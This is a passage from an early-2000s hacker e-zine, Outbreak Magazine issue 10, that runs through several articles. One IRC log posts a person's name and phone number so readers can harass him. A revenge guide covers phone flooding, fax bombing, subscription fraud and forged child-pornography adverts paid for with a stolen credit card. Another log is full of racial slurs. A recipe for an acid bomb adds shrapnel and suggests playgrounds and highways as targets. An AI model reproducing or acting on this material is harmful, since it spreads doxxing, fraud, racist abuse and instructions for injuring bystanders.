kl3ptic: I mean, i would be scared too.. if i had to take on the fucking PAC MAN NINJA!

kl3ptic: damn straight

KoNkReTeEleMeNt: oh oh im not scared

kl3ptic: right ;-)

kl3ptic: you're pissing your little cammo panties

kl3ptic: c'mon blaine..  lets pac man this shit up

kl3ptic: lets do this old school

KoNkReTeEleMeNt: yo fuck u kid

kl3ptic: like willy from the wizard!

kl3ptic: yeah!

kl3ptic: hey man.  you a little scared?

kl3ptic: little yellow stripe down your pac man wussy back?

kl3ptic: thats cool

kl3ptic: Fear my Pac Man ninja skills

kl3ptic: cause when those Ghosts come up

kl3ptic: i fucking chomp those bitches

kl3ptic: left and right

kl3ptic: fear 

KoNkReTeEleMeNt: ok then tell me the last name

kl3ptic: lowwer or how ever you spell it

kl3ptic: bizatch

KoNkReTeEleMeNt: no urs bitch 

kl3ptic: You don't need my name.  You just address me as "Pac Man Ninja"

kl3ptic: oh yes. 

kl3ptic: I'll Ninja spike your ass back to pac man land bizatch!

kl3ptic: make you shit your little cammo panties

KoNkReTeEleMeNt: yo if this is brian ill strait fuck u up bitch

kl3ptic: brian?

kl3ptic: this is Nick you little Mrs. Pac Man pansy

KoNkReTeEleMeNt: yo who ever it is dont let me cacth ur bitch ass

kl3ptic: you wont be able to.

kl3ptic: cause im a freaking ninja

kl3ptic: pac man style

kl3ptic: just when you think you're alone.. . BAM..  ninja spike to the back of the skull

kl3ptic: drop kick your nuts.. make you piss your camo panties

KoNkReTeEleMeNt: ok peace u want to talk some shit here is my number call me now bitch 789 8203

kl3ptic: i already got it

kl3ptic: and i will call ;-)



==============================================================
Some kid wanted me to harass him.. so I did.. here's his info
if you want to harass him:

Blaine Lowwer
410-789-8203


More of my logs can be found on my site: http://www.kleptic.tk
==============================================================                              
			      °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 12 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

Digital Multiplexing System 

By Adeamis

Dms was made by the northern telecom in 1979 
and can be interfaced with the listed switches
1.ESS 1-4
2.Xbar
3.TSPS
4.EAX

The dms was made to be small to have room for other installations
LCM line concentrating module
MDF main distribution frame

DMS are in the Class5 Switching
DMS 100 integrates voice and data in a total business communications system and up to 30,000 lines
DMS-10 for up to 10,800 lines mostly connected with big brother dms 100 or 200 switch
DMS 200 access's 60,000 trunks also serve a AT access tandem function can also control controls Operater-assisted calls
DMS 250 not often used

The Phukin Functions

Call Waiting Lamp

Loop Keys - There are 6 loop keys, each with its associated source and
            destination lamp to indicate the calling and called party states.
Alphanumeric Display
Multiple Directory Numbers
Feature Keys - Up to a total of 42.  Some of them could be used for Speed
               Calling and Paging System.
Incoming Call Identifier
Exclude Source/Exclude Destination - privacy keys
Signal Source/Signal Destination:  Release Source/Release Destination

Console 

Access to paging
Call hold
Call detail entry                      Remote console
Call Selection                         Console display
Camp-on                                Automatic recall
Conference - 6 port                    Two-way splitting
Non-delayed operation                  Attendant transfer
Locked loop operation                  Busy verification of lines
Manual and automatic hold              Multiple console operation
Busy verification of trunks            Switched loop operation
Trunk g
roup busy indication                   Uniform call distribution form queue
Multiple listed directory numbers      Control of trunk group access
Secrecy                                Night service
Serial call                            Speed calling
Lockout                                Delayed operation
Position busy                          Interposition calling
Through dialing


Dms allows BUSINESS's to have 

LCD
Indicators
Call Forwarding
Automatic Line
Call Pick-up
Ring Again - automatically redials busy numbers until they are free
Multiple Directory Numbers
Intercom
Speed Call
Call Transfer/Conference
On-Hook Dialing

Programmable Functions

Automatic Hold
Listen-on Hold
Multiple Appearance Directory Numbers (MADN)
Single Call Arrangement
Multiple Call Arrangement
Privacy Release
Tone Ringing with Volume Control
End-to-End Signaling
Call Park
Make Set Busy
Malicious
Call Trace
Busy Override
Attendant Recall
Call Waiting
Stored Number Redial
Private Business Line
32 Character Alphanumeric Display

wich as you can see most of that shit they use everywhere so dms are very popuLAR

DMS is remote switching with a bunch of remote modules in a bunch of
sizes and capabilities including SXS replacement or growth and Office feature's.  
The use of remote modules give the CO more floor space that would usually be used by the Line Concentrating Modules

Trunk Module

(TM) The Trunk Module - changes incoming speech into digital format, it has the
ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
information is combined with the trunks supervisory and control signals then
transmitted at 2.56 Mb/s over speech links to the network not just with landlines.

The TM also uses service circuits such as Multifrequency (MF) receivers,
announcement trunks, and test circuits.  Each TM has the ability to interface
30 analog trunks or service circuits to the network over one 32-channel speech
link.  The TM is not traffic sensitive so each trunk can carry 36 CCS.

Digital Carrier Module

The Digital Carrier Module (DCM) is a digital interface between the DMS
switch and the DS-1 digital carrier.  
The DS-1 signal consists of 24 voice channels.
The DCM takes out and puts in signaling and control information on
the DS-1 bit streams which then makes them DS-30 32-channel speech links. The
DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
channel speech links.  The DCM can carry a maximum of 36 CCS of traffic on
each trunk.

Line Module

The Line Module (LM) gives an interface for a maximum of 640 analog lines and
condenses the voice and signaling into two, three, or four DS-30, 32-channel
speech links.  Four speech links have the ability to handle 3,700 Average Busy
Season Busy Hour (ABSBH) CCS per LM.

Operator Features

With the use of DMS-200 or DMS 100/200 switch, operator features are available
by the following:

Traffic Operator Position System (TOPS)
Operator Centralization (OC)
Auxiliary Operator Service System (AOSS)

Traffic Operator Position System (TOPS) gives many operator function on inward
and outward calls.  The TOPS integrates the operator system with the DMS-200
or DMS-100/200 toll switch.

One voice and one data circuit are needed for each operator position.  The
voice circuit is connected to a port of a three-port conference circuit.  The
other two ports are connected to the calling and called parties.  The data
circuit is used for a digital modem and is used to transmit data punched in by
the operator to the CCC for processing.

Operator Centralization

Operator Centralization (OC) lets the operator use the services given by the
DMS-200 or DMS-100/200 with TOPS.  With OC operator traffic from surrounding
DMS sites can be routed to a central host site.

                       Operator Centralization Diagram



          Routing                   - - -
         <-----\     DMS-200       | AMA |
                \   Remote TC     / - - -
                 = = = = = = =   /
                | \  ----- ___|_/
                |  \: DMS :   |
                |   : 200 :   |                    Host TC           -----
                |   :     :   |                = = = = = = = =     /| POS |
                |   :  (OC:___|               |   ---------   |   / |- - -|
                |   :     :   |\              |  : DMS-200 :  |  /  |Oper.|
                |    -----\   | \             |  :  (TOPS) :__|_/    -----
                 = = = = = = =   \____________|__:         :  |
          Trib Ope Traffic->\     ____________|__:OC)      :  |
                             \   /            |  :         :  |
          Non-DMS Remote TC     /             |   ---------   |
          = = = = = = = = = = =                = = = = = = = =
         |   --------   -----  |
         |  :  TDM   : :  (OC: |
         |  : Switch : :     : |      -----
         |  :        : : DMS :_|_____: AMA :
         |  :        : : 200 : |      -----
         |  /--------   -----\ |
          = = = = = = = = = = =
          /Routing             \ <-Trib Opr Traffic
          \------->             \

Equal Access

Equal Access (EA) is accessible through DMS switches with the addition of
software packages.  Both Equal Access End Office (EAEO) for the DMS-100 and
Access Tandem (AT) for the DMS-200 provide equal access features.




                Equal Access Network Application




                --------- __________________________________
(Phone)--------| DMS-100 |___________                       |
                ---------            |                      |
           NON-EAEO                  |                      |IC/INC
           --------               --------             /---------\   TO
(Phone)---|        |------------| DMS-200 |------------           ---- IC/INC
           --------              ---------             \---------/   /----->
                                     |                      |
                --------- ___________|                      |
(Phone)--------| DMS-100 |__________________________________|
                ---------



DMS-100 EAEO

The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
Area) carriers Point of Presence (POP) inside the LATA.  The DMS-200 AT gives
a traffic concentration and distribution function for interLATA traffic
originating  or terminating inside a LATA. It allows the following:

10XXX and 950-1XXX dialing
presubscription dialing
equal access and normal network control signaling
Automatic Number Identification (ANI) on all calls
custom calling services

Common Channel Interoffice Signaling No. 6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The basis for the CCIS system is the International Consultative Committee on
Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
to its fullest capacity for use in the Stored Program Control (SPC) network of
AT&T.

The CCIS6 network contains a bunch of signaling regions, each having a pair of
interconnected Signal Transfer Points (STP).  The switching systems put into
CCIS6 that connect to STPs are called Serving Offices (SO).

Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks
using the CCIS network.

Direct Signaling (CCIS-DS) is used for signaling between SPC switching
machines and a Network Control Point (NCP).  At the present time, CCIS6 can
handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
Screening (BNS).  CCIS6 is available with DMS-100/200, DMS-200, and
DMS-100/200 or DMS-200 with TOPS.


CCIS6 Diagram:
                                            NSB        ST
                      ------------         - - - - - - - - - - -
          DTC        |            |      |            -------    |
         - - -  DS30 |    IPML    | DS30 |  - - -    | ||    |   |
--------|     |------|- - - - - - |------|-|     |---| ||    |   |
Digital  - - -       |            |      |  - - -    | ||    |   |
Trunks               |            |      |           | ||    |   |
                     |            |      |            -------    |
                     |            |        - - - - - - -|- - - -
          DTC        |            |          TM         |
  DIG    - - -  DS30 |    NUC     |  DS30   - - -      -----
--------|     |------|- - - - - - |--------|     |----|     |
^        - - -       |Network     |         - - -      -----
CCIS         \        ------------                     Modem
Signaling     \            |
           - - -         -----
AN Links--|     |       | CCC |
           - - -         -----
          Channel
           Bank



Acronyms:

        DIG - Digital
        AN - Analog
        DTC - Digital Trunk Controller
        MSB - Message Switch Buffer
        ST - Signaling Terminal
        TM - Trunk Module
        NUC - Nailed-Up Connection
        IPML - Inter-Peripheral Message Link

Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT
No. 7.  CCIS7/CCS7 on the DMS switch consists of two parts:  the Message
Transfer Part (MTP) and the Interim Telephone user Part.  They are compatible
with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.

CCIS7 can't tell the difference between banded and direct signaling.  CCIS7
uses Destination/Origination Point Codes (DPC/OPC) to route back to the
switch.

CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local
Area Signaling Services, and Direct Service Dialing Capabilities.

A DMS-100 IBN or SL-100 can remotely serve many locations from the host site.
This is done by a connection through digital transmission facilities which are
set up at remote modules at the subscriber's premises.

Here are some diagrams showing the differences between normal private
telecommunications networks and ESN networks.

                      Normal telecommunications network
                      

           -----               ------
  [Fone]--| SnS |             | SL-1 |-[Fone]
          | PBX |             | PBX  |
           -----               ------
           |  |DOD/DID   DOD/DID|  |
           |   -------   -------   |
           |Tie       | |       Tie|
           |Trunk  ---------  Trunk|
            ------| Class-5 |------
              ----| Centrex |----
             |     ---------     |
             |                   |
             |                   |
             |                   |
           -----  Tie Trunk  ---------
          | SnS | ----------| Class-5 |
          | PBX |           | Centrex |
           -----             ---------
             |                   |
             |                   |
             |                   |
             |                   |
          -------             ------
  [Fone]-| Small |           | SL-1 |-[Fone]
         |  PBX  |           |      |
          -------             ------


                                  ESN Network
                                  ===========
          --------                               ----------
 [Fone]--| Remote |                             | SL-1 PBX |--[Fone]
         | Module |                             | ESN Main |
          --------                               ----------
              |                                       |
              |  DS-1 Facility                        |  DS-1 Facility
              |            --------------             |
               -------->  | Local Class 5|  <---------
           [Fone]---------|    DMS-100   |
                      ----|    IBN/ESN   |-------------
        2W Loop MFIDP |    --------------             | ESN Trunk Group
           or DS-1    |           |                   |     or DS-1
                      |         -----         ---------------
                      |        | CSC |       | Local Class 5 |
                   --------     -----        |    DMS-100    |
                  | SL-100 | <--- DS-1 ----> |    IBN/ESN    |
                   --------     Facility      ---------------
                      |                              |
                      |                              |
                      | DS-1 Facility                | DS-1 Facility
                      |                              |
                   --------                      ----------
          [Fone]--| Remote |                    | SL-1 PBX |--[Fone]
                  | Module |                    | ESN Main |
                   --------                      ----------





Thanks To All The People That Helped To Contribute Any Info You Have On Dms
                             
			      °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 13 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

=========================================
Some More Ways To Get Revenge On Spammers
=========================================
By: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM: kl3ptic
=========================================

Phone call flooding, fax bombing, and magazine subscription harassing
---------------------------------------------------------------------

Unlike dropcode's text in Outbreak #10 about fighting spam. Here are some 
"physical ways" to get revenge.

---

Most spam is designed to sell you a product. If the spammer strips out a 
return e-mail address, the only way to contact the spammer maybe through 
a phone or fax number or an ordinary mailing address.

Because spam usually lists a way to contact the spammer, many people choose 
one of two hostile (and illegal) methods of exacting revenge on a spammer. 
One is phone call flooding, wherein your computer repeatedly dials the 
spammer's phone number, thereby preventing real customers from getting 
through. The other is fax bombing, which involves sending multiple faxes 
(usually numbering in the hundreds) to jam a spammer's fax machine with 
useless messages, giving them a taste of their own spamming. Both ways cost 
you money, but the rewards in emotional satisfaction may be worth it. 
Here's how you do it:

Just as spammers use bulk e-mailing programs to send mass quantities of e-mail, 
you can use war dialers to dial numbers over and over again. You type in the 
phone number and how often you want to call it, then the program dials that 
number over and over until you tell it to stop. You can do this for voice and
 fax phone numbers just as well. (But beware: if you overuse this tactic, your 
target can get the police and phone company to trace the calls back to you. 
So if you fear Ma Bell, use tactics to keep yourself hidden.)

For a safer but slower way to get your revenge against a spammer, copy down 
the spammer's postal address. Then fill out the postage paid subscription 
forms that come with every magazine and mail them in. Pretty soon the spammer
will get flooded with magazines and a bill for each one of them. Canceling each 
magazine subscription will waste the spammer's time and possibly wreck their 
credit rating too, once multiple magazines start reporting the spammer as 
delinquent in paying their subscription bills.

For a more automated solution for tracking down a spammer, search for a copy of 
SpamShot, Spamicide, or SpamHater. SpamShot lets you filter spam automatically 
from your e-mail account so you don't have to bother deleting it yourself. 
SpamHater automates the process of retrieving a spammer's real e-mail address and 
provides you with polite or nasty letters that you can mail back to them.


Forging a spammer's messages
----------------------------

If a spammer really gets on your nerves, here's a sneaky way to make his or 
her life difficult. Open an Internet account (such as AOL) using a credit 
card (how you get that CC is your own problem). Send messages to certain 
Usenet newsgroups pretending to advertise products or services, using the 
spammer's telephone or fax number. Then cancel your account.

For example, visit the social.religion.christian news-groups, leave a message
advertising hardcore child pornography CD-ROM's or devil-worshipping books 
for sale to any "interested" parties, and leave the spammer's phone number or
mailing address. You're sure to infuriate news-group members, who will retaliate 
by sending the hate mail to the spammer. Of course the spammer won't have any 
idea why so many people are suddenly calling or sending hate messages to him.

Spammers are likely to continue haunting the internet, so you might as well have 
fun with them at their expense. Wether you decide to use hate mail, phone call
flooding, e-mail bombing, or any other vengeful tactic to retaliate against 
spammers, as long as you're happy, who cares how the fucking spammers feel?


==============================================================
Shout Outs: jenny <3, lexi, dropcode, gr3p, rambox, joja, 
turbo, timeless, the enigma, radioactive raindeer, everyone on
#outbreakzine on dalnet, and #outbreak on irc.spasm.org. 
If I forgot anyone. I'm sorry.
==============================================================

 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 14 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


lexi (n0Cixel): lexi@sugarpants.org / http://sugarpants.org 
jenny (sugah/heavenly): jennybean@sugarpants.org  / http://sugarpants.org/heavenly


Start of #dirtysouth buffer: Sun Sep 29 03:10:26 2002
* Now talking in #dirtysouth
* n0CixeL has joined #dirtysouth
<n0CixeL> awwwwwwwwwwwwwwwwwwwww shit
<shuga> aw haaaail nah
<n0CixeL> nigga word
<shuga> bout to tear some crazay shit up in here, WERD
<n0CixeL> ATL LIKE FUCKING WHAT
<shuga> ATL
<n0CixeL> nig pimpin
<n0CixeL> braiding weeve
<shuga> whatchoo doin?
<shuga> i'm chillin
<n0CixeL> buying weeve online girl
<shuga> tryin to make mah legs look got so ashy
<n0CixeL> weevestore.com
<shuga> gurl they nasty
<n0CixeL> coco buttah girl
<shuga> i got me some of that new coco buttah from sally's
<shuga> mmm girl
<shuga> ya you know
<n0CixeL> aww hell yeah
<n0CixeL> that balm shit
<n0CixeL> mmmhmm
<shuga> shit ya gurl
<shuga> gurl i got me some of that new grease for my hair
<n0CixeL> that jerry curl special shit
<n0CixeL> mmmhmm
<n0CixeL> in the pink box
<shuga> its real good but gurl, it get mah hands all nasty
<n0CixeL> naw girl thats good for your hands girl
<n0CixeL> that oil
<n0CixeL> my skin sucks it right up
<shuga> you know coco buttah helps scars girl?
<n0CixeL> but i leave fingah prints on my car door
<n0CixeL> if they find them
<n0CixeL> i'm going to jail
<n0CixeL> cause you know it be stolen
<n0CixeL> hahah
<shuga> tamika up at Afrikan Braids tole me that yesterday
<n0CixeL> aww hell yeah
<n0CixeL> she a smart girl
<shuga> i saw this white boy
<shuga> walkin up 10th street
<shuga> actin like he some dreadlock rasta
<shuga> girl he was crazy
<n0CixeL> girllll there some weird folk up in the atl
<n0CixeL> you BEST believe
<shuga> gurl i know
<shuga> i be takin mah boo wherever i go
<shuga> you know dis
<n0CixeL> yes girl you best believe
<shuga> i meant to ask you
<n0CixeL> yeah girl what up
<shuga> hows quiefla?
<n0CixeL> girl she fine
<n0CixeL> she got gas
<n0CixeL> but she be ok
<shuga> yo she still roll with that nigga tyrone?
<n0CixeL> that surgery on her head to get that fake weeve really 
  messed her up
<n0CixeL> all the skress
<n0CixeL> she be having gas
<n0CixeL> yeahhh
<n0CixeL> that nigga tyrone got him an new caddy
<shuga> yeah girl shasima got that shit about foe days ago
<shuga> hell nah girl
<n0CixeL> aww yeah girl
<n0CixeL> it be tight
<n0CixeL> it's an older model like an 80
<shuga> yo you remember that geeky ass nigga jerome?
<n0CixeL> but he's pimpin it
<shuga> guurrrl you dont know
<shuga> he be blingin now
<n0CixeL> aww naw that used to roll with juantiffa?
<shuga> yeah gurl
<n0CixeL> ooo girl hook a nigga up
<shuga> he be pimpin his navigator up and down peachtree street
<n0CixeL> aww hell yeah
<n0CixeL> i needs to hook up with him
<n0CixeL> that nigga is fine
<n0CixeL> cept that gap
<shuga> i wish i would have called him a broken ass nigga when he 
  asked me to hit up tha movie "friday"
<n0CixeL> in hes teefies
<shuga> you know that movie girl
<shuga> when it was on the big screen
<shuga> wif ice cube
<shuga> that nigga crazy
<n0CixeL> mmhmm
<n0CixeL> he's fly
<n0CixeL> i'd like to sit on his cube
<shuga> how are your nine sistahs girl?
<n0CixeL> HEHEHEH knownsayn?
<shuga> they aight?
<n0CixeL> girlll they good
<shuga> HAHA i feel u gurl
<ajay`> what the fuck is this
<shuga> yo what up?
<ajay`> two guys pretending to be chicks on irc?
<n0CixeL> damn nigga
<n0CixeL> what's up
<n0CixeL> naw we is chicks
<n0CixeL> lol
<n0CixeL> from the ATLLLLLLLLLL
<ajay`> how'd u find this chan
<shuga> where you from, gurl
<shuga> dude iz the dirty souf
<shuga> the dirty souf aint shiet wifout atl
<n0CixeL> hell yeah girl you know
<ajay`> how old are you
<ajay`> shuga
<shuga> but nah girl i got my eye on that nigga jermaine
<shuga> 21 gurl
<n0CixeL> mmm jermaine be fine
<n0CixeL> i heard he's got a big member
<shuga> hell yeah 
<n0CixeL> knowmsayn?
<shuga> yeah i heard that too
<n0CixeL> :)
<ajay`> u got a pic?
<shuga> yeah g
<n0CixeL> i got my nails done today
<n0CixeL> they be lookin so good
<ajay`> send it
<shuga> yeah lemme find one
<ajay`> cool
<n0CixeL> mmm ajay so what's up
<n0CixeL> you got a big stick baby?
<ajay`> no
<n0CixeL> why not
<ajay`> cmp3 [a: Psychodrama-Greatest_Hits-2000-AUD - s: 
  12-psychodrama-crook_county-aud.mp3] [5m14s\192kbit(44.1khz)]
<ajay`> hmm
<ajay`> genetics?
<ajay`> maybe just chance
<ajay`> you 21 also?
<shuga> yeah girl this be me
<shuga> hang on
<shuga> http://sugarpants.org/heavenly/shuga.jpg
<n0CixeL> hey girl
<n0CixeL> show him me
<shuga> aight girl one second
<shuga> http://sugarpants.org/heavenly/n0cixel.jpg
<shuga> thats mah gurl nocixel
<ajay`> right
<shuga> damn right girl
<ajay`> heh
<shuga> you know
<shuga> we fly rite
<shuga> ?
<ajay`> nah
<shuga> honey we fly as hail
<shuga> when we ryde up to the club 
* n0CixeL has quit IRC (girl i lost my weeve)
<shuga> yo i'm out like the broke ass niggas one toof
<shuga> one
End of #dirtysouth buffer    Sun Sep 29 03:10:26 2002

lexi greets: adeamis, kleptic, dropcode, semi, lenny, blackout, smiley, tiffany, & pickled
cum.

jenny greets: kleptic <3, dropcode, adeamis, gr3p, rambo, tiffany, blackout, lenny, semi,
smiley, pickles.

MUCH LOVE FOE' CHUNKY ASS CHEESE TEEF FROM THE BOF OF US.                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 15 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

[The construction of an acid bomb]
[by: joja]
[for: outbreak #10 baby, woo!]


Disclaimer: This text is for educational purposes only! If you use this text
as a means to do something destructive, that's your own fault.


I.     What you'll need and how to get it.
II.    How to "safely" construct your bomb.
III.   Different Methods.
IIII.  Where to throw this fucker.


I. What you'll need and how to get it.

  The muratic acid bomb consists of three main materials:
                 
              1. A 2-3 litre plastic bottle(for now).
              2. Some aluminum foil.
              3. Muratic Acid.
  
  You can play with these and use different methods, which I'll
explain later. The aluminum foil and bottles are the easiest to 
obtain. But so is the muratic acid! You can buy muratic acid at
any pool supply store. It usually comes in red one gallon jugs but, 
I'm unsure of the price. If they ask any questions just say your dad
said he needed some for the pool, and you weren't sure.

II. How to "safely" construct your bomb.
  
   To construct your acid bomb, first prepare the aluminum foil.
To prepare, take the foil and crumble it into a cylindrical bar,
small enough to fit into the bottle but you want to compress it. 
So really there's one thick bar of foil. You can use more than one 
alluminum "bar" as we'll call it to make it explode faster.

Next, pour your muratic acid into the plastic bottle to about half
way. Remember to keep the cap! Try not to inhale the fumes because
they ARE toxic, and very unpleasant.The muratic acid is safe in the 
plastic bottle for it doesn't react to plastics, it reacts to metal, 
like foil :), just keep the cap off.

The final step is the most crucial. Some bombs take a couple minutes,
some take a couple seconds. All you do is put the aluminum bar into
the bottle and cap it fast. Shake it up and throw it somewhere. Make 
sure you're a safe distance away from it because the acid does 
splatter, and you don't want it in your eyes. Within a few minutes, 
your bomb will explode. There's no fire or mushroom clouds, so don't try 
and blow up your school with acid bombs. They just make a really loud
boom and have the potential to do a little damage. (Like a mailbox).

III. Different methods.

 You can use bigger, or smaller bottles. Even glass bottles or jars
for your bomb. As long as the bottle has a secure cap, it will work 
just fine. The one thing that should stay the same is the foil. 
Always use foil. Even if you want to make an acid bomb with a mason
jar, some ball bearings, and nails, put the foil in there too. 
Shrapnel is always fun, you can use whatever you want, just be sure
to get the fuck out of the way after you insert the foil and cap it.
But If you are using other metals in your bomb, it will explode faster,
so be careful, because that's what the acid reacts to. Metal.

IIII. Where to throw this fucker.

This is the fun part. There are so many places to set off your acid 
bomb. Such as a playground during recess, or in someone's car if thier
window is down. It's easiest to get away if you're in a car, just have
the acid in the bottle(un-capped),the foil and the cap ready when you 
find your target. Mailboxes, dumpsters, your neighbor's doggy-door. 
A public bathroom, even a lake. The possibilities are endless. Just be 
creative, be safe, and watch out for pigs. You can even through it into an 
intersection, or a main highway. Anything is possible.

Acid bombs are phun, and I hope you have as much fun with them as I 
have.
- joja.

I wanted to be cool and have greets in my text this time :D.
Greets go out to: kleptic, rambox, gr3p, turdblow, jenny, lexi, 
dropcode, lenny, DirV, failure, clops, drH, Mr. Bubble, Marlboro cigarettes,
Pharmaceuticals, semi, debaser, redbox, rc, Mancow, dewey, Apocal,
hypah, and midget. "and anyone else I forgot." 

-- I feel so cool right now.

                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 16 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

------------------------------------------------------------------------------------------

Corporate Intrusion: How an attacker gets in

By: Turbanator

------------------------------------------------------------------------------------------
  
  I would first like to start off this text by stating that I in no way endorse
the use of the methods contained in this text file to be used in ANY illegal 
activity, this is simply for informational purposes.

-=I. Choosing the victim=-

  When a hacker attempts to infiltrate any system, weather it be through social 
engineering or through computer means, they most of the time choose their targets 
carefully, and for some unknown (at least to the victim) reason.  Most hackers, 
at least the "leet" ones, wont simply go out and randomly choose some company to 
attack just because they don't like their website layout.

-=II. Probing the victim=-

  Now that the hacker has chosen his designated target, he can begin to look for 
any weaknesses the victim may have.  The attacker can find out as much info on any 
of the employees in a company as possible, then use that information in a process 
known as social engineering. When a hacker is social engineering, he will most 
likely speak in a calm monotone voice, and use words with complicated meanings, and 
repeat his "given instructions" to give a sense of authority over his victim.  Once 
the hacker has extracted the information he needs, he then proceeds to use it in the 
correct way.

-=III. Probing the corporation=-

  Once the hacker has the information he needs, he can then use it accordingly on the 
target corporation.  Normally the hacker will play around with them for a bit, to see 
what the employees are actually like, and get to know their strengths, and more 
importantly, their weaknesses.  If someone at the front desk, or even in the high level 
offices has given out personal information about thing they like, things they hate, etc. 
to someone they "know," then they have most likely been a target for an attack at one 
time or another.  Just because you've talked to Jim in accounting in the 34th cubical on 
the 4th floor a couple of times, doesn't mean he is your friend, and a hacker will most 
likely pose as Jim, so that he can become your "friend" and get the information he wants 
out of you.

-=IV. Testing the information=-

  With his newly accuired sensative information, the hacker then proceeds to find a major,
yet unknown weakness in the corporation, and exploit it.  So with his new passwords the
hacker looks around the company web site for an "employees only" login prompt.  Bingo, its 
cleverly hidden at http://www.victimcorp.com/employeelogin.htm.  Now he can access some of 
the internal networks of the corporation, exposing sensative information, while posing as 
Jim from accounting in the 34th cubical on the 4th floor, even though Jim is out sick with 
the flu this week...

-=More to come!=-

  With me being my lazy self I didnt have enough time to write as much 
as I originally wanted to, so look for "Corporate Intrusion: Part 2: Congrats! Your hacked!" 
soon.


------------------------------------------------------------------------------------------
This text file was written by:Turbanator
For:Outbreak
The author can be contacted at:turbanator2k2@yahoo.com, 
AIM=Turbanator2k2
------------------------------------------------------------------------------------------
 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
